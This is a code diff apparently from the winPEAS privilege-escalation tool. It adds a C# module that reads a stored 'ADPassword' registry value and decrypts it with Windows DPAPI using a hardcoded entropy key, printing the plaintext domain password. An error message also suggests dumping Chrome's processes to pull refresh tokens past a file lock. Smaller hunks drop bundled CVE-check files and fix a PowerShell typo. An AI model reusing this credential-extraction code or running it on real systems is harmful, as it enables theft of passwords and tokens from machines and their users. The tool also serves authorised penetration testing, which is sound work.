byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };
|
||||
|
||||
|
||||
// Decrypt auth token
|
||||
byte[] encryptedEncodedAuthToken = advapi.ReadRegistryValue(regAddr, @"ADPassword");
|
||||
byte[] decryptedData = DecryptData(encryptedEncodedAuthToken, entropyBytes);
|
||||
string plainPasswd = Encoding.Unicode.GetString(decryptedData).TrimEnd('\0');
|
||||
GPSRegValues.Add("ADPassword decrypted", plainPasswd);
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.PrintException("Error trying to decrypt and decode the ADPassword. You will need to check it yourself. It's in " + hive + "\\" + regAddr + " (key: ADPassword)\nError was: " + ex.Message);
|
||||
GPSRegValues.Add("ADPassword (error)", "Error trying to decrypt and decode the AuthToken. You will need to check it yourself. It's in " + hive + "\\" + regAddr);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Format the info in expected CloudInfo format
|
||||
List <EndpointData> _endpointDataList = new List<EndpointData>();
|
||||
|
||||
foreach (var kvp in GPSRegValues)
|
||||
{
|
||||
_endpointDataList.Add(new EndpointData()
|
||||
{
|
||||
EndpointName = kvp.Key,
|
||||
Data = kvp.Value?.Trim(),
|
||||
IsAttackVector = false
|
||||
});
|
||||
}
|
||||
|
||||
return _endpointDataList;
|
||||
}
|
||||
|
||||
public string ExtractValue(string input, string pattern)
|
||||
{
|
||||
Match match = Regex.Match(input, pattern);
|
||||
if (match.Success)
|
||||
{
|
||||
return match.Groups[1].Value;
|
||||
}
|
||||
return "Not found";
|
||||
}
|
||||
|
||||
|
||||
public override Dictionary<string, List<EndpointData>> EndpointDataList()
|
||||
{
|
||||
if (_endpointData == null)
|
||||
{
|
||||
_endpointData = new Dictionary<string, List<EndpointData>>();
|
||||
|
||||
try
|
||||
{
|
||||
if (IsAvailable)
|
||||
{
|
||||
_endpointData.Add("Local Info", GetGPSValues());
|
||||
}
|
||||
else
|
||||
{
|
||||
_endpointData.Add("General Info", new List<EndpointData>()
|
||||
{
|
||||
new EndpointData()
|
||||
{
|
||||
EndpointName = "",
|
||||
Data = null,
|
||||
IsAttackVector = false
|
||||
}
|
||||
});
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.PrintException(ex.Message);
|
||||
}
|
||||
}
|
||||
|
||||
return _endpointData;
|
||||
}
|
||||
|
||||
public override bool TestConnection()
|
||||
{
|
||||
return true;
|
||||
}
|
||||
|
||||
public byte[] DecryptData(byte[] encryptedData, byte[] entropyBytes)
|
||||
{
|
||||
Native.Crypt32.DATA_BLOB dataIn = new Native.Crypt32.DATA_BLOB();
|
||||
Native.Crypt32.DATA_BLOB dataOut = new Native.Crypt32.DATA_BLOB();
|
||||
Native.Crypt32.DATA_BLOB optionalEntropy = new Native.Crypt32.DATA_BLOB();
|
||||
|
||||
try
|
||||
{
|
||||
// Prepare the DATA_BLOB for input data
|
||||
dataIn.pbData = Marshal.AllocHGlobal(encryptedData.Length);
|
||||
dataIn.cbData = encryptedData.Length;
|
||||
Marshal.Copy(encryptedData, 0, dataIn.pbData, encryptedData.Length);
|
||||
|
||||
// Initialize output DATA_BLOB
|
||||
dataOut.pbData = IntPtr.Zero;
|
||||
dataOut.cbData = 0;
|
||||
|
||||
// Prepare the DATA_BLOB for optional entropy
|
||||
optionalEntropy.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
|
||||
optionalEntropy.cbData = entropyBytes.Length;
|
||||
Marshal.Copy(entropyBytes, 0, optionalEntropy.pbData, entropyBytes.Length);
|
||||
|
||||
// Call CryptUnprotectData with optional entropy
|
||||
bool success = Native.Crypt32.CryptUnprotectData(
|
||||
ref dataIn,
|
||||
null,
|
||||
ref optionalEntropy,
|
||||
IntPtr.Zero,
|
||||
IntPtr.Zero,
|
||||
0,
|
||||
ref dataOut);
|
||||
|
||||
if (!success)
|
||||
throw new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error());
|
||||
// Copy decrypted data to a byte array
|
||||
byte[] decryptedData = new byte[dataOut.cbData + 2];
|
||||
Marshal.Copy(dataOut.pbData, decryptedData, 0, dataOut.cbData);
|
||||
|
||||
return decryptedData;
|
||||
}
|
||||
finally
|
||||
{
|
||||
// Free allocated memory
|
||||
if (dataIn.pbData != IntPtr.Zero)
|
||||
Marshal.FreeHGlobal(dataIn.pbData);
|
||||
if (dataOut.pbData != IntPtr.Zero)
|
||||
Marshal.FreeHGlobal(dataOut.pbData);
|
||||
if (optionalEntropy.pbData != IntPtr.Zero)
|
||||
Marshal.FreeHGlobal(optionalEntropy.pbData);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
public static class Base32HexDecoder
|
||||
{
|
||||
private static readonly char[] Alphabet = "0123456789abcdefghijklmnopqrstuv".ToCharArray();
|
||||
private static readonly Dictionary<char, int> CharMap = new Dictionary<char, int>();
|
||||
|
||||
static Base32HexDecoder()
|
||||
{
|
||||
for (int i = 0; i < Alphabet.Length; i++)
|
||||
{
|
||||
CharMap[Alphabet[i]] = i;
|
||||
}
|
||||
}
|
||||
|
||||
public static byte[] Decode(string input)
|
||||
{
|
||||
input = input.ToLowerInvariant();
|
||||
List<byte> bytes = new List<byte>();
|
||||
|
||||
int buffer = 0;
|
||||
int bitsLeft = 0;
|
||||
|
||||
foreach (char c in input)
|
||||
{
|
||||
if (!CharMap.ContainsKey(c))
|
||||
throw new ArgumentException("Invalid character in base32hex string.");
|
||||
|
||||
buffer = (buffer << 5) | CharMap[c];
|
||||
bitsLeft += 5;
|
||||
|
||||
if (bitsLeft >= 8)
|
||||
{
|
||||
bitsLeft -= 8;
|
||||
bytes.Add((byte)((buffer >> bitsLeft) & 0xFF));
|
||||
}
|
||||
}
|
||||
|
||||
return bytes.ToArray();
|
||||
}
|
||||
}
|
||||
@@ -242,7 +242,7 @@ namespace winPEAS.Info.CloudInfo
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Console.WriteLine("Error extracting refresh tokens (If Chrome is running the DB is probably locked): " + ex.Message);
|
||||
Beaprint.PrintException("Error extracting refresh tokens (If Chrome is running the DB is probably locked but you could dump Chrome's procs and search it there or go around this lock): " + ex.Message);
|
||||
return refreshTokens.ToArray();
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1,4 +1,6 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using Microsoft.Win32.SafeHandles;
|
||||
using System;
|
||||
using System.Runtime.ConstrainedExecution;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.AccessControl;
|
||||
@@ -222,6 +224,58 @@ namespace winPEAS.Native
|
||||
ref uint cchReferencedDomainName,
|
||||
out SID_NAME_USE peUse);
|
||||
|
||||
// P/Invoke declaration for RegQueryValueExW
|
||||
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
|
||||
public static extern int RegQueryValueExW(
|
||||
SafeRegistryHandle hKey,
|
||||
string lpValueName,
|
||||
IntPtr lpReserved,
|
||||
out uint lpType,
|
||||
byte[] lpData,
|
||||
ref uint lpcbData);
|
||||
|
||||
public byte[] ReadRegistryValue(string keyPath, string valueName)
|
||||
{
|
||||
using (RegistryKey baseKey = Registry.LocalMachine) // Access HKLM
|
||||
using (RegistryKey subKey = baseKey.OpenSubKey(keyPath, writable: false))
|
||||
{
|
||||
if (subKey == null)
|
||||
throw new InvalidOperationException("Registry key not found.");
|
||||
|
||||
SafeRegistryHandle hKey = subKey.Handle;
|
||||
uint lpType;
|
||||
uint dataSize = 0;
|
||||
|
||||
// First call to determine the size of the data
|
||||
int ret = RegQueryValueExW(
|
||||
hKey,
|
||||
valueName,
|
||||
IntPtr.Zero,
|
||||
out lpType,
|
||||
null,
|
||||
ref dataSize);
|
||||
|
||||
if (ret != 0)
|
||||
throw new System.ComponentModel.Win32Exception(ret);
|
||||
|
||||
byte[] data = new byte[dataSize];
|
||||
|
||||
// Second call to get the actual data
|
||||
ret = RegQueryValueExW(
|
||||
hKey,
|
||||
valueName,
|
||||
IntPtr.Zero,
|
||||
out lpType,
|
||||
data,
|
||||
ref dataSize);
|
||||
|
||||
if (ret != 0)
|
||||
throw new System.ComponentModel.Win32Exception(ret);
|
||||
|
||||
return data;
|
||||
}
|
||||
}
|
||||
|
||||
public static string TranslateSid(string sid)
|
||||
{
|
||||
// adapted from http://www.pinvoke.net/default.aspx/advapi32.LookupAccountSid
|
||||
|
||||
27
winPEAS/winPEASexe/winPEAS/Native/crypt32.cs
Normal file
27
winPEAS/winPEASexe/winPEAS/Native/crypt32.cs
Normal file
@@ -0,0 +1,27 @@
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
|
||||
namespace winPEAS.Native
|
||||
{
|
||||
internal class Crypt32
|
||||
{
|
||||
// P/Invoke declaration for CryptUnprotectData
|
||||
[StructLayout(LayoutKind.Sequential)]
|
||||
public struct DATA_BLOB
|
||||
{
|
||||
public int cbData;
|
||||
public IntPtr pbData;
|
||||
}
|
||||
|
||||
[DllImport("crypt32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
|
||||
public static extern bool CryptUnprotectData(
|
||||
ref DATA_BLOB pDataIn,
|
||||
StringBuilder ppszDataDescr,
|
||||
ref DATA_BLOB pOptionalEntropy,
|
||||
IntPtr pvReserved,
|
||||
IntPtr pPromptStruct,
|
||||
int dwFlags,
|
||||
ref DATA_BLOB pDataOut);
|
||||
}
|
||||
}
|
||||
@@ -1220,6 +1220,8 @@
|
||||
<Compile Include="Info\CloudInfo\AWSInfo.cs" />
|
||||
<Compile Include="Info\CloudInfo\AzureInfo.cs" />
|
||||
<Compile Include="Info\CloudInfo\EndpointData.cs" />
|
||||
<Compile Include="Info\CloudInfo\GPSInfo.cs" />
|
||||
<Compile Include="Info\CloudInfo\GCDSInfo.cs" />
|
||||
<Compile Include="Info\CloudInfo\GWorkspaceInfo.cs" />
|
||||
<Compile Include="Info\CloudInfo\GCPInfo.cs" />
|
||||
<Compile Include="Info\CloudInfo\CloudInfoBase.cs" />
|
||||
@@ -1377,6 +1379,7 @@
|
||||
<Compile Include="Native\Enums\UserPrivType.cs" />
|
||||
<Compile Include="Native\Enums\WTS_INFO_CLASS.cs" />
|
||||
<Compile Include="Native\Iphlpapi.cs" />
|
||||
<Compile Include="Native\crypt32.cs" />
|
||||
<Compile Include="Native\Ntdll.cs" />
|
||||
<Compile Include="Native\Kernel32.cs" />
|
||||
<Compile Include="Native\Netapi32.cs" />
|
||||
@@ -1451,23 +1454,6 @@
|
||||
<Compile Include="Helpers\ReflectionHelper.cs" />
|
||||
<Compile Include="Helpers\Registry\RegistryHelper.cs" />
|
||||
<Compile Include="Helpers\Search\SearchHelper.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-0836.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-0841.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1064.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1130.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1253.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1315.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1385.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1388.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2019-1405.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2020-0668.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2020-0683.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2020-1013.cs" />
|
||||
<Compile Include="3rdParty\Watson\Msrc\CVE-2020-0796.cs" />
|
||||
<Compile Include="3rdParty\Watson\Vulnerability.cs" />
|
||||
<Compile Include="3rdParty\Watson\VulnerabilityCollection.cs" />
|
||||
<Compile Include="3rdParty\Watson\Watson.cs" />
|
||||
<Compile Include="3rdParty\Watson\Wmi.cs" />
|
||||
<Compile Include="Wifi\Wifi.cs" />
|
||||
<Compile Include="Wifi\NativeWifiApi\Interop.cs" />
|
||||
<Compile Include="Wifi\NativeWifiApi\WlanClient.cs" />
|
||||
|
||||
@@ -68,7 +68,7 @@ Function Start-ACLCheck {
|
||||
$Identity += "$env:COMPUTERNAME\$env:USERNAME"
|
||||
if ($ACLObject.Owner -like $Identity ) { Write-Host "$Identity has ownership of $Target" -ForegroundColor Red }
|
||||
# This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds "group name" to the first column.
|
||||
whoami.exe /groups /fo csv | select-objet -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }
|
||||
whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }
|
||||
$IdentityFound = $false
|
||||
foreach ($i in $Identity) {
|
||||
$permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }
|
||||
@@ -1227,7 +1227,7 @@ Write-Host "Will enumerate SMB Shares and Access if any are available"
|
||||
Get-SmbShare | Get-SmbShareAccess | ForEach-Object {
|
||||
$SMBShareObject = $_
|
||||
# see line 70 for explanation of what this does
|
||||
whoami.exe /groups /fo csv | select-objet -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object {
|
||||
whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object {
|
||||
if ($SMBShareObject.AccountName -like $_ -and ($SMBShareObject.AccessRight -like "Full" -or "Change") -and $SMBShareObject.AccessControlType -like "Allow" ) {
|
||||
Write-Host -ForegroundColor red "$($SMBShareObject.AccountName) has $($SMBShareObject.AccessRight) to $($SMBShareObject.Name)"
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user